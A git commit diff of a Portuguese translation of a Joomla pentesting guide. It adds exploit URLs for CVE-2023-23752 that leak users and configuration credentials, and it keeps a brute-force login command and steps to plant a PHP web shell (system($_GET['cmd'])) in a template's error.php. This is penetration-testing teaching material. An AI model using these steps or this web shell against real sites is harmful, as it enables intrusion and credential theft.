Translated ['network-services-pentesting/pentesting-web/joomla.md'] to p

This commit is contained in:
Translator 2024-04-10 11:57:18 +00:00
parent 7546908f14
commit 864f4fa90e

View file

@ -78,9 +78,18 @@ curl https://www.joomla.org/ | grep Joomla | grep generator
```bash
droopescan scan joomla --url http://joomla-site.local/
```
### Brute-Force
### API Divulgação de Informações Não Autenticadas:
As versões de 4.0.0 a 4.2.7 são vulneráveis à divulgação de informações não autenticadas (CVE-2023-23752) que irá expor credenciais e outras informações.
Você pode usar este [script](https://github.com/ajnik/joomla-bruteforce) para tentar fazer força bruta no login.
- Usuários: `http://<host>/api/v1/users?public=true`
- Arquivo de Configuração: `http://<host>/api/index.php/v1/config/application?public=true`
**Módulo MSF**: `scanner/http/joomla_api_improper_access_checks` ou script ruby: [51334](https://www.exploit-db.com/exploits/51334)
### Força Bruta
Você pode usar este [script](https://github.com/ajnik/joomla-bruteforce) para tentar força bruta no login.
```shell-session
sudo python3 joomla-brute.py -u http://joomla-site.local/ -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr admin
@ -91,7 +100,7 @@ admin:admin
Se você conseguiu obter **credenciais de admin**, você pode **RCE dentro dela** adicionando um trecho de **código PHP** para obter **RCE**. Podemos fazer isso **personalizando** um **template**.
1. **Clique** em **`Templates`** na parte inferior esquerda em `Configuração` para abrir o menu de templates.
2. **Clique** em um nome de **template**. Vamos escolher **`protostar`** sob o cabeçalho da coluna `Template`. Isso nos levará à página **`Templates: Customise`**.
2. **Clique** em um nome de **template**. Vamos escolher **`protostar`** sob o cabeçalho `Template`. Isso nos levará à página **`Templates: Customise`**.
3. Por fim, você pode clicar em uma página para abrir a **fonte da página**. Vamos escolher a página **`error.php`**. Vamos adicionar um **comando PHP de uma linha para obter execução de código** da seguinte forma:
1. **`system($_GET['cmd']);`**
4. **Salvar e Fechar**